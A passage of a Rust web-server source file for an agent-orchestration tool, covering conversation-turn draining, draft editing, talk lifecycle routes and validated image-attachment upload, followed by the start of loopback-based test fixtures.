4358    tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4359    Ok((StatusCode::ACCEPTED, Json(view)))
4360}
4361
4362/// Drain [`talk::Talk::pending`] one turn at a time until nothing is left,
4363/// releasing `turn` only once a check finds it truly empty. Shared by both
4364/// callers that can end up owning a talk's turn slot with something already
4365/// queued for it: `talk_say`'s normal path, after its own `talk::respond`
4366/// call, and `talk_say`'s busy path, when it reclaims a slot the previous
4367/// holder just gave up - see the comment at that call site.
4368///
4369/// The release is folded into the final generation check under `turn`'s own
4370/// lock - the same lock [`Ui::begin_talk_turn`] takes to decide "busy or
4371/// free". Before its blocking `talk::drain`, this loop observes the queued
4372/// generation. A `say` that sees the turn busy writes its draft, then advances
4373/// that generation. Thus, if it lands while the drain is in flight, the final
4374/// check observes the advance and drains again; otherwise it releases the
4375/// claim while holding the same lock. This keeps the release/arrival handoff
4376/// atomic without holding the global claim mutex across filesystem I/O.
4377async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
4378    let live_set = Arc::clone(&turn.turns);
4379    // `Option` rather than binding `turn` directly to a `_turn` that lives
4380    // for the whole function: releasing it has to happen by calling
4381    // `TalkTurnGuard::release` from inside the locked branch below, which
4382    // takes `self` by value. Left as a plain drop instead, `Drop` would still
4383    // remove the id - correctly, if this loop is ever left some other way -
4384    // but doing it there misses the lock this loop is already holding, which
4385    // is the exact gap `release` exists to close.
4386    let mut turn = Some(turn);
4387    loop {
4388        // `talk::drain` takes the store lock and can write/rename the talk
4389        // file. Keep the turn mutex out of that synchronous work: it protects
4390        // every talk's in-memory claim, not this talk's disk operation.
4391        let observed = live_set
4392            .lock()
4393            .unwrap_or_else(PoisonError::into_inner)
4394            .queued
4395            .get(&id)
4396            .copied()
4397            .unwrap_or(0);
4398        let drained = blocking({
4399            let talks = talks.clone();
4400            move || {
4401                let result = talk::drain(&mut talk, &talks);
4402                Ok((talk, result))
4403            }
4404        })
4405        .await;
4406        let (next_talk, result) = match drained {
4407            Ok(drained) => drained,
4408            Err(e) => {
4409                tracing::warn!(
4410                    status = %e.status,
4411                    message = %e.message,
4412                    "talk {id} could not start queued-text drain"
4413                );
4414                let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4415                turn.take()
4416                    .expect("held for the whole loop until released here")
4417                    .release(&mut live);
4418                break;
4419            }
4420        };
4421        talk = next_talk;
4422        let drained = match result {
4423            Ok(Some(drained)) => drained,
4424            Ok(None) => {
4425                let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4426                if live.queued.get(&id).copied().unwrap_or(0) != observed {
4427                    continue;
4428                }
4429                turn.take()
4430                    .expect("held for the whole loop until released here")
4431                    .release(&mut live);
4432                break;
4433            }
4434            Err(e) => {
4435                tracing::warn!("talk {id} could not drain queued text: {e:#}");
4436                let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4437                turn.take()
4438                    .expect("held for the whole loop until released here")
4439                    .release(&mut live);
4440                break;
4441            }
4442        };
4443        if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
4444            tracing::warn!("talk {id} turn failed: {e:#}");
4445        }
4446    }
4447}
4448
4449/// Clear a queued draft only if it remains exactly the one the caller saw.
4450async fn talk_pending_clear(
4451    State(ui): State<Arc<Ui>>,
4452    Path(id): Path<String>,
4453    body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
4454) -> ApiResult<Json<TalkView>> {
4455    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4456    blocking(move || {
4457        let id = resolve_talk(&ui.talks, &id)?;
4458        let mut talk = ui.talks.get(&id)?;
4459        if !talk.status.open() {
4460            return Err(ApiError::conflict(format!(
4461                "talk {} is {} and takes no more turns",
4462                talk.short(),
4463                talk.status.as_str()
4464            )));
4465        }
4466        if !talk::clear_pending_if_matches(
4467            &mut talk,
4468            &ui.talks,
4469            &body.expected_text,
4470            &body.expected_attachments,
4471        )? {
4472            return Err(ApiError::conflict(
4473                "queued message changed; reload it before clearing",
4474            ));
4475        }
4476        let thinking = ui.is_thinking(&talk.id);
4477        Ok(Json(TalkView::new(talk, thinking)))
4478    })
4479    .await
4480}
4481
4482/// Atomically edit a queued draft's text while preserving its attachments.
4483/// The snapshot fields make a concurrent queue or drain a conflict rather
4484/// than silently discarding either message.
4485async fn talk_pending_edit(
4486    State(ui): State<Arc<Ui>>,
4487    Path(id): Path<String>,
4488    body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
4489) -> ApiResult<Json<TalkView>> {
4490    let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4491    let (view, reclaimed) = blocking({
4492        let ui = Arc::clone(&ui);
4493        move || {
4494            let id = resolve_talk(&ui.talks, &id)?;
4495            let mut talk = ui.talks.get(&id)?;
4496            if !talk.status.open() {
4497                return Err(ApiError::conflict(format!(
4498                    "talk {} is {} and takes no more turns",
4499                    talk.short(),
4500                    talk.status.as_str()
4501                )));
4502            }
4503            if !talk::edit_pending_text(
4504                &mut talk,
4505                &ui.talks,
4506                &body.text,
4507                &body.expected_text,
4508                &body.expected_attachments,
4509            )? {
4510                return Err(ApiError::conflict(
4511                    "queued message changed; reload it before editing",
4512                ));
4513            }
4514            let claim = match ui.begin_queued_talk_turn(&id)? {
4515                Some(turn_guard) => {
4516                    let (cfg, _) = Config::discover(&talk.repo, None)?;
4517                    Some((talk.clone(), cfg, id.clone(), turn_guard))
4518                }
4519                None => None,
4520            };
4521            let thinking = ui.is_thinking(&id);
4522            Ok((TalkView::new(talk, thinking), claim))
4523        }
4524    })
4525    .await?;
4526    if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4527        let talks = ui.talks.clone();
4528        tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4529    }
4530    Ok(Json(view))
4531}
4532
4533/// `POST /api/talks/{id}/close`.
4534async fn talk_close(
4535    State(ui): State<Arc<Ui>>,
4536    Path(id): Path<String>,
4537) -> ApiResult<Json<TalkView>> {
4538    blocking(move || {
4539        let id = resolve_talk(&ui.talks, &id)?;
4540        let mut talk = ui.talks.get(&id)?;
4541        talk::close(&mut talk, &ui.talks)?;
4542        let thinking = ui.is_thinking(&talk.id);
4543        Ok(Json(TalkView::new(talk, thinking)))
4544    })
4545    .await
4546}
4547
4548/// `POST /api/talks/{id}/reopen`.
4549async fn talk_reopen(
4550    State(ui): State<Arc<Ui>>,
4551    Path(id): Path<String>,
4552) -> ApiResult<Json<TalkView>> {
4553    blocking(move || {
4554        let id = resolve_talk(&ui.talks, &id)?;
4555        let mut talk = ui.talks.get(&id)?;
4556        talk::reopen(&mut talk, &ui.talks)?;
4557        let thinking = ui.is_thinking(&talk.id);
4558        Ok(Json(TalkView::new(talk, thinking)))
4559    })
4560    .await
4561}
4562
4563/// `DELETE /api/talks/{id}`.
4564///
4565/// Removes the conversation's record and artifacts outright, unlike
4566/// [`talk_close`] which keeps the record as history. A turn already in
4567/// flight is not refused here the way [`run_delete`] refuses a live run:
4568/// [`talk::record`] and the tail of [`talk::turn`] check for themselves,
4569/// under [`Talks::guard`], that the record they are about to write back is
4570/// still there, so a delete racing a turn is safe without this route having
4571/// to know a turn is running at all.
4572async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4573    blocking(move || {
4574        let id = resolve_talk(&ui.talks, &id)?;
4575        ui.talks.remove(&id)?;
4576        Ok(StatusCode::NO_CONTENT)
4577    })
4578    .await
4579}
4580
4581/// Expand an id or short id to exactly one talk id.
4582fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4583    pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4584}
4585
4586/// `POST /api/talks/{id}/attachments` - upload one image to attach to a
4587/// future `talk-say`.
4588async fn talk_attachment_post(
4589    State(ui): State<Arc<Ui>>,
4590    Path(id): Path<String>,
4591    headers: HeaderMap,
4592    body: Bytes,
4593) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4594    let mime = validate_attachment(&headers, &body)?;
4595    let name = filename_header(&headers);
4596    let data = body.to_vec();
4597    blocking(move || {
4598        let id = resolve_talk(&ui.talks, &id)?;
4599        let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4600        Ok((StatusCode::CREATED, Json(att)))
4601    })
4602    .await
4603}
4604
4605/// `GET /api/talks/{id}/attachments/{att}` - the stored image back, for a
4606/// `<img>` tag in the transcript.
4607async fn talk_attachment_get(
4608    State(ui): State<Arc<Ui>>,
4609    Path((id, att)): Path<(String, String)>,
4610) -> ApiResult<Response> {
4611    blocking(move || {
4612        let id = resolve_talk(&ui.talks, &id)?;
4613        let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4614            return Err(ApiError::not_found(format!(
4615                "talk {id} has no attachment `{att}`"
4616            )));
4617        };
4618        Ok(attachment_response(&meta.mime, data))
4619    })
4620    .await
4621}
4622
4623/// Validate an attachment upload's declared `Content-Type` and the bytes
4624/// themselves, returning the canonical mime on success.
4625///
4626/// Two checks, both required: the header has to name one of
4627/// [`ATTACHMENT_MIME_WHITELIST`] (which is what keeps SVG out - it is
4628/// simply never in the list, active content rather than a picture, the same
4629/// exclusion [`asset_content_type`]'s doc explains), and the file's own
4630/// magic number has to agree. The second is what stops a mislabeled upload -
4631/// an HTML file sent as `Content-Type: image/png` - from ever reaching disk;
4632/// a declared type is a claim, not a fact, so it is never trusted alone.
4633fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4634    if data.len() > ATTACHMENT_MAX_BYTES {
4635        return Err(ApiError::bad_request(format!(
4636            "attachment is {} bytes, over the {} MiB limit",
4637            data.len(),
4638            ATTACHMENT_MAX_BYTES / (1024 * 1024)
4639        ))
4640        .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4641    }
4642    if data.is_empty() {
4643        return Err(ApiError::bad_request("attachment is empty"));
4644    }
4645    let declared = declared_mime(headers)?;
4646    match sniffed_mime(data) {
4647        Some(sniffed) if sniffed == declared => Ok(declared),
4648        Some(sniffed) => Err(ApiError::bad_request(format!(
4649            "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4650        ))),
4651        None => Err(ApiError::bad_request(
4652            "the file's bytes do not match any accepted image format",
4653        )),
4654    }
4655}
4656
4657/// The declared `Content-Type`, checked against [`ATTACHMENT_MIME_WHITELIST`]
4658/// and nothing else - parameters like `; charset=` are stripped, but the
4659/// value itself is not otherwise interpreted.
4660fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4661    let raw = headers
4662        .get(header::CONTENT_TYPE)
4663        .and_then(|v| v.to_str().ok())
4664        .unwrap_or("")
4665        .split(';')
4666        .next()
4667        .unwrap_or("")
4668        .trim()
4669        .to_ascii_lowercase();
4670    ATTACHMENT_MIME_WHITELIST
4671        .iter()
4672        .find(|&&m| m == raw)
4673        .copied()
4674        .ok_or_else(|| {
4675            if raw == "image/svg+xml" {
4676                ApiError::bad_request(
4677                    "SVG is not accepted: it can carry active content (e.g. a <script>), \
4678                     not just a picture",
4679                )
4680            } else if raw.is_empty() {
4681                ApiError::bad_request("Content-Type is required for an attachment upload")
4682            } else {
4683                ApiError::bad_request(format!(
4684                    "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4685                     image/gif or image/webp"
4686                ))
4687            }
4688        })
4689}
4690
4691/// Identify an image by its magic number, independent of whatever
4692/// `Content-Type` claimed.
4693fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4694    if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4695        Some("image/png")
4696    } else if data.starts_with(b"\xff\xd8\xff") {
4697        Some("image/jpeg")
4698    } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4699        Some("image/gif")
4700    } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4701        Some("image/webp")
4702    } else {
4703        None
4704    }
4705}
4706
4707/// The operator's own filename, from [`FILENAME_HEADER`], kept only for
4708/// display - see [`talk::Attachment::name`]'s doc on why it never
4709/// contributes to a path. A missing or blank header (curl without it, an
4710/// older front end) falls back to a generic name rather than refusing the
4711/// upload over a field that is cosmetic.
4712fn filename_header(headers: &HeaderMap) -> String {
4713    headers
4714        .get(FILENAME_HEADER)
4715        .and_then(|v| v.to_str().ok())
4716        .map(str::trim)
4717        .filter(|s| !s.is_empty())
4718        .unwrap_or("attachment")
4719        .to_owned()
4720}
4721
4722/// Every attachment `GET` response: the mime re-validated against the same
4723/// closed whitelist the upload route enforces - never the string trusted
4724/// verbatim off disk - plus `X-Content-Type-Options: nosniff`, so a browser
4725/// cannot decide it knows better than the type we send. Unlike a panel asset
4726/// there is no [`PANEL_CSP`] here: this is a plain image the phone's own
4727/// document renders inline, not agent-authored HTML in a sandboxed frame.
4728fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4729    let content_type = ATTACHMENT_MIME_WHITELIST
4730        .iter()
4731        .find(|&&m| m == mime)
4732        .copied()
4733        .unwrap_or("application/octet-stream");
4734    (
4735        [
4736            (header::CONTENT_TYPE, content_type),
4737            (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4738        ],
4739        body,
4740    )
4741        .into_response()
4742}
4743
4744/// The configuration for a repository, read off the disk for this request.
4745///
4746/// Through [`blocking`] because discovery reads and merges several TOML files,
4747/// and because the alternative - caching it in [`Ui`] at startup - would mean
4748/// the operator's phone kept interviewing with a roster they had already
4749/// changed, with no way to reload it but restarting the server they are not
4750/// sitting in front of.
4751async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4752    let repo = repo.to_path_buf();
4753    blocking(move || {
4754        let (cfg, _) = Config::discover(&repo, None)?;
4755        Ok(cfg)
4756    })
4757    .await
4758}
4759
4760/// The one prefix rule, used for both runs and tasks: a leading match for a
4761/// full id, a trailing match for the short form an operator reads off a
4762/// report. Written here rather than borrowed from `queue::resolve_id` because
4763/// the UI needs the two failures as different status codes, and telling them
4764/// apart from an error message is not something to build a route on.
4765fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4766    let mut hits = ids
4767        .into_iter()
4768        .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4769    match (hits.next(), hits.next()) {
4770        (Some(one), None) => Ok(one),
4771        (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4772        (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4773            "`{prefix}` matches more than one {what}, including {a} and {b}"
4774        ))),
4775    }
4776}
4777
4778#[cfg(test)]
4779mod tests {
4780    use pretty_assertions::assert_eq;
4781    use serde_json::Value;
4782    use tempfile::TempDir;
4783    use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4784
4785    use super::*;
4786    use crate::config::Config;
4787    use crate::queue::{Source, TaskStatus};
4788
4789    /// How many 10ms steps a settle loop takes before it calls a stall a
4790    /// stall - thirty seconds.
4791    ///
4792    /// These loops wait on real `sh` subprocesses, and the machine that runs
4793    /// the gate runs several suites at once, so a two-second budget was not
4794    /// waiting for the reply, it was racing the scheduler: two of these
4795    /// tests failed under that load with the turn simply not landed yet.
4796    /// This is a hang guard, not a latency assertion - every loop breaks the
4797    /// moment its condition holds, so a generous cap costs an idle machine
4798    /// nothing and still fails a genuine hang instead of hanging the suite.
4799    const SETTLE_STEPS: usize = 3_000;
4800
4801    /// A home with a queue and a runs directory, and a router serving it on
4802    /// loopback. `tower`'s `oneshot` is not reachable - `tower` is axum's
4803    /// dependency, not ours - so the tests drive a real socket, which has the
4804    /// side benefit of asserting the status line and content types the phone
4805    /// actually receives.
4806    struct Fixture {
4807        home: TempDir,
4808        addr: SocketAddr,
4809    }
4810
4811    impl Fixture {
4812        async fn start() -> Self {
4813            Self::with_loop(launch_idle).await
4814        }
4815
4816        /// A fixture whose loop is `launch`.
4817        async fn with_loop(launch: Launch) -> Self {
4818            let home = TempDir::new().expect("temp home");
4819            let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4820            Self { home, addr }
4821        }
4822
4823        /// A fixture whose `ui.repo` is a real directory rather than the
4824        /// usual placeholder - for the routes that read config off it
4825        /// (`GET /api/repos`) and would otherwise have nothing to discover.
4826        async fn with_repo(repo: PathBuf) -> Self {
4827            let home = TempDir::new().expect("temp home");
4828            let addr = Self::serve(home.path(), repo, launch_idle).await;
4829            Self { home, addr }
4830        }
4831
4832        async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4833            let queue = Queue::at(home.join("queue"));
4834            let runs = home.join("runs");
4835            std::fs::create_dir_all(&runs).expect("runs dir");
4836            let worktrees = home.join("wt").join("magi");
4837            std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4838            let ui = Ui::new(
4839                queue,
4840                Questions::at(home.join("questions")),
4841                Talks::at(home.join("talks")),
4842                runs,
4843                home.to_path_buf(),
4844                repo,
4845            )
4846            .with_worktrees_root(worktrees)
4847            .with_launch(launch);
4848            let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4849                .await
4850                .expect("bind loopback");
4851            let addr = listener.local_addr().expect("local addr");
4852            tokio::spawn(async move {
4853                let _ = axum::serve(listener, ui.router()).await;
4854            });
4855            addr
4856        }
4857
4858        fn queue(&self) -> Queue {
4859            Queue::at(self.home.path().join("queue"))
4860        }
4861
4862        fn questions(&self) -> Questions {
4863            Questions::at(self.home.path().join("questions"))
4864        }
4865
4866        fn talks(&self) -> Talks {
4867            Talks::at(self.home.path().join("talks"))
4868        }
4869
4870        fn runs(&self) -> PathBuf {
4871            self.home.path().join("runs")
4872        }
4873
4874        async fn get(&self, path: &str) -> Res {
4875            request(self.addr, "GET", path, None).await
4876        }
4877
4878        /// The status and headers without the body, which is how the front end
4879        /// preflights a panel: a sandboxed frame is opaque to the parent
4880        /// document, so the only way to tell "no panel" from "a panel that
4881        /// rendered blank" is to ask before mounting.
4882        async fn head(&self, path: &str) -> Res {
4883            request(self.addr, "HEAD", path, None).await
4884        }
4885
4886        async fn post(&self, path: &str, body: Option<&str>) -> Res {
4887            request(self.addr, "POST", path, body).await
4888        }
4889
4890        async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4891            request_with(self.addr, "GET", path, None, extra).await
4892        }
4893
4894        async fn delete(&self, path: &str) -> Res {
4895            request(self.addr, "DELETE", path, None).await
4896        }
4897
4898        /// `POST` a raw body with its own headers - see [`request_bytes`].
4899        async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4900            request_bytes(self.addr, path, headers, body).await
4901        }
4902    }
4903
4904    struct Res {
4905        status: u16,
4906        headers: String,
4907        /// The header block with its original casing, for the assertions that
4908        /// compare a header *value* rather than looking for a name. Lowercasing
4909        /// a CSP would hide a directive spelled with a capital letter, and the
4910        /// whole point of that test is that the string is exactly right.
4911        head: String,
4912        body: String,
4913        /// The body before any UTF-8 handling, for the routes that serve
4914        /// something other than text. A panel asset is a PNG as often as not,
4915        /// and `from_utf8_lossy` would silently replace half of it.
4916        bytes: Vec<u8>,
4917    }
4918
4919    impl Res {
4920        fn json(&self) -> Value {
4921            serde_json::from_str(&self.body)
4922                .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4923        }
4924
4925        /// One header's value verbatim, or `None` when it was not sent.
4926        fn header(&self, name: &str) -> Option<&str> {
4927            self.head.lines().find_map(|line| {
4928                let (key, value) = line.split_once(':')?;
4929                key.trim()
4930                    .eq_ignore_ascii_case(name)
4931                    .then(|| value.trim_start().trim_end_matches('\r'))
4932            })
4933        }
4934    }
4935
4936    /// A one-shot HTTP/1.1 client. `Connection: close` is what lets the reply
4937    /// be read to end-of-stream without parsing framing.
4938    async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4939        request_with(addr, method, path, body, &[]).await
4940    }
4941
4942    /// As [`request`], with extra request headers - conditional GETs need
4943    /// `If-None-Match`, and a server that sets an `ETag` it never compares is
4944    /// worse than one that sets none.
4945    async fn request_with(
4946        addr: SocketAddr,
4947        method: &str,
4948        path: &str,
4949        body: Option<&str>,
4950        extra: &[(&str, &str)],
4951    ) -> Res {
4952        let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4953        for (name, value) in extra {
4954            head.push_str(&format!("{name}: {value}\r\n"));
4955        }
4956        if let Some(body) = body {
4957            head.push_str("Content-Type: application/json\r\n");
4958            head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4959        }
4960        head.push_str("\r\n");
4961        if let Some(body) = body {
4962            head.push_str(body);
4963        }
4964        let mut socket = tokio::net::TcpStream::connect(addr)
4965            .await
4966            .expect("connect to the test server");
4967        socket
4968            .write_all(head.as_bytes())
4969            .await
4970            .expect("write request");
4971        let mut raw = Vec::new();
4972        socket.read_to_end(&mut raw).await.expect("read response");
4973        // Split on the raw bytes rather than on a lossy string, so a binary
4974        // body survives to be compared byte for byte.
4975        let split = raw
4976            .windows(4)
4977            .position(|w| w == b"\r\n\r\n")
4978            .expect("a header block");
4979        let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4980        let bytes = raw[split + 4..].to_vec();
4981        let status = head
4982            .lines()
4983            .next()
4984            .and_then(|line| line.split_whitespace().nth(1))
4985            .and_then(|code| code.parse().ok())
4986            .expect("a status line");
4987        Res {
4988            status,
4989            headers: head.to_lowercase(),
4990            head,
4991            body: String::from_utf8_lossy(&bytes).into_owned(),
4992            bytes,
4993        }
4994    }
4995
4996    /// A `POST` carrying a raw binary body and its own headers, for the
4997    /// attachment upload route - `request_with` only ever sends
4998    /// `Content-Type: application/json`, which is wrong for an image and
4999    /// would corrupt anything not valid UTF-8 by round-tripping it through
5000    /// `&str` first.
5001    async fn request_bytes(
5002        addr: SocketAddr,
5003        path: &str,
5004        headers: &[(&str, &str)],
5005        body: &[u8],
5006    ) -> Res {
5007        let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
5008        for (name, value) in headers {
5009            head.push_str(&format!("{name}: {value}\r\n"));
5010        }
5011        head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
5012        let mut socket = tokio::net::TcpStream::connect(addr)
5013            .await
5014            .expect("connect to the test server");
5015        socket
5016            .write_all(head.as_bytes())
5017            .await
5018            .expect("write request head");
5019        socket.write_all(body).await.expect("write request body");
5020        let mut raw = Vec::new();
5021        socket.read_to_end(&mut raw).await.expect("read response");
5022        let split = raw
5023            .windows(4)
5024            .position(|w| w == b"\r\n\r\n")
5025            .expect("a header block");
5026        let head = String::from_utf8_lossy(&raw[..split]).into_owned();
5027        let bytes = raw[split + 4..].to_vec();
5028        let status = head
5029            .lines()
5030            .next()
5031            .and_then(|line| line.split_whitespace().nth(1))
5032            .and_then(|code| code.parse().ok())
5033            .expect("a status line");
5034        Res {
5035            status,
5036            headers: head.to_lowercase(),
5037            head,
5038            body: String::from_utf8_lossy(&bytes).into_owned(),
5039            bytes,
5040        }
5041    }
5042
5043    /// A run on disk, without touching the process-global magi home.
5044    fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
5045        let mut state = RunState::new(
5046            PathBuf::from("/repo/magi"),
5047            "main".to_owned(),
5048            "0123456789abcdef".to_owned(),
5049            "Add a web UI\n\nMobile first.".to_owned(),
5050            Config::default(),
5051        );
5052        state.id = id.to_owned();
5053        state.status = status;
5054        let dir = runs.join(id);
5055        std::fs::create_dir_all(&dir).expect("run dir");
5056        std::fs::write(
5057            dir.join("run.json"),
5058            serde_json::to_string_pretty(&state).expect("serialize run"),
5059        )
5060        .expect("write run.json");
5061    }
5062
5063    fn write_daemon(home: &FsPath, updated_at: Timestamp) {
5064        let body = serde_json::json!({
5065            "schema": 1,
5066            "pid": 4242,
5067            "started_at": Timestamp::now().to_string(),
5068            "updated_at": updated_at.to_string(),
5069            "idle": false,
5070            "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
5071            "completed": 7,
5072            "polls": 143,
5073        });
5074        std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
5075    }
5076
5077    /// A loop that starts, finds nothing to do, and waits to be told to stop.
5078    ///
5079    /// No test in this file may start the real loop - see [`Ui::launch`] for
5080    /// why - so this stands in for the only thing the routes need a loop to
5081    /// do: keep running until `Stop` is set, then return. A real
5082    /// `serve_until` here would resolve its queue and its status file through
5083    /// the process-global magi home, claim whatever it found in the
5084    /// operator's live backlog, overwrite the status file of the `magi serve`
5085    /// that owns it, and spend real agent quota on a real competition.
5086    fn launch_idle(
5087        _opts: daemon::Opts,
5088        stop: daemon::Stop,
5089    ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
5090        Box::pin(async move {
5091            while !stop.stopped() {
5092                tokio::time::sleep(Duration::from_millis(2)).await;
5093            }
5094            Ok(())
5095        })
5096    }
5097
5098    /// A loop that fails on the way up, the way one whose home has gone
5099    /// read-only does.
5100    fn launch_broken(
5101        _opts: daemon::Opts,
5102        _stop: daemon::Stop,
5103    ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
5104        Box::pin(async {
5105            Err(anyhow::anyhow!(
5106                "publish the daemon status file: read-only file system"
5107            ))
5108        })
5109    }
5110
5111    /// The address the parking loop knocks on, and what it heard there.
5112    ///
5113    /// A [`Launch`] is a plain function pointer, so a stand-in loop cannot
5114    /// capture a fixture's address; this is how it is handed one. Only
5115    /// `the_deck_answers_while_it_parks_and_frees_the_address_first` touches
5116    /// these, so nothing else in this binary can race them.
5117    static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
5118    static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
5119
5120    /// A loop that, once it is asked to stop, checks the deck still answers
5121    /// before it goes.
5122    ///
5123    /// It stands in for a run mid-node: `finish_loop` waits for this future,
5124    /// so the request it makes is strictly inside the park window - no sleep
5125    /// and no polling needed to be sure of that.
5126    fn launch_knocking_on_the_way_out(
5127        _opts: daemon::Opts,
5128        stop: daemon::Stop,
5129    ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
5130        Box::pin(async move {
5131            while !stop.stopped() {
5132                tokio::time::sleep(Duration::from_millis(2)).await;
5133            }
5134            let addr = PARK_KNOCK
5135                .lock()
5136                .expect("park knock")
5137                .expect("the test set an address");
5138            let heard = request(addr, "GET", "/api/health", None).await.status;
5139            *PARK_HEARD.lock().expect("park heard") = Some(heard);
5140            Ok(())
5141        })
5142    }
5143
5144    /// The loop view once `want` accepts it.
5145    ///
5146    /// Polled rather than asserted straight after the POST because stopping
5147    /// is deliberately not instant - that is the contract - and rather than
5148    /// slept through because a fixed wait is either flaky or slow.
5149    /// `SETTLE_STEPS` is far longer than a stand-in loop needs and still
5150    /// finite, so a genuine hang fails the test instead of hanging the
5151    /// suite.
5152    async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
5153        for _ in 0..SETTLE_STEPS {
5154            let view = fx.get("/api/loop").await.json();
5155            if want(&view) {
5156                return view;
5157            }
5158            tokio::time::sleep(Duration::from_millis(10)).await;
5159        }
5160        panic!(
5161            "the loop never settled: {}",
5162            fx.get("/api/loop").await.json()
5163        );
5164    }
5165
5166    /// File an open question directly in the store the server reads.
5167    fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
5168        let store = fx.questions();
5169        let mut q = Question::new(
5170            "20260902-000000-beef".to_owned(),
5171            "implement".to_owned(),
5172            "impl-A".to_owned(),
5173            summary.to_owned(),
5174            "because it matters".to_owned(),
5175            choices.iter().map(|c| (*c).to_owned()).collect(),
5176        );
5177        store.put(&mut q).expect("put question");
5178        q.id
5179    }
5180
5181    /// A question with a panel the server can serve, plus the named assets.
5182    ///
5183    /// Written through `Questions::put_panel` rather than by laying out the
5184    /// directory here, so these tests exercise the same on-disk shape the
5185    /// agents produce and cannot pass against a layout only the tests know.
5186    fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
5187        let store = fx.questions();
5188        let mut q = Question::new(
5189            "20260902-000000-beef".to_owned(),
5190            "land".to_owned(),
5191            "fix".to_owned(),
5192            "Merge this?".to_owned(),
5193            "the diff is in the panel".to_owned(),
5194            vec!["merge".to_owned(), "hold".to_owned()],
5195        );
5196        // Staged outside the questions root, because `put_panel` copies from
5197        // wherever the agent left its files.
5198        let staging = fx.home.path().join("staging");
5199        std::fs::create_dir_all(&staging).expect("staging dir");
5200        let sources: Vec<PathBuf> = assets
5201            .iter()
5202            .map(|(name, bytes)| {
5203                let path = staging.join(name);
5204                std::fs::write(&path, bytes).expect("write staged asset");
5205                path
5206            })
5207            .collect();
5208        store
5209            .put_panel(&mut q, html, &sources)
5210            .expect("write the panel");
5211        store.put(&mut q).expect("put question");
5212        q.id
5213    }
5214
5215    /// A talk on disk, without talking to a model.
5216    ///
5217    /// Written as JSON straight into the store the server reads, because the
5218    /// only constructor `talk::begin` offers takes no turn but still requires
5219    /// a real caller-visible flow. The one thing this cannot make up is the
5220    /// seat, so it is built with the real `SeatState::new` and serialized -
5221    /// the alternative, hand-writing that object, would make these tests fail
5222    /// the day the seat gains a field.
5223    fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
5224        let store = fx.talks();
5225        std::fs::create_dir_all(store.root()).expect("talks dir");
5226        let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
5227            .expect("serialize a seat");
5228        let body = serde_json::json!({
5229            "schema": 1,
5230            "id": id,
5231            "repo": "/repo/magi",
5232            "agent": "mock",
5233            "status": status,
5234            "turns": [],
5235            "created_at": Timestamp::now().to_string(),
5236            "updated_at": Timestamp::now().to_string(),
5237            "seat": seat,
5238        });
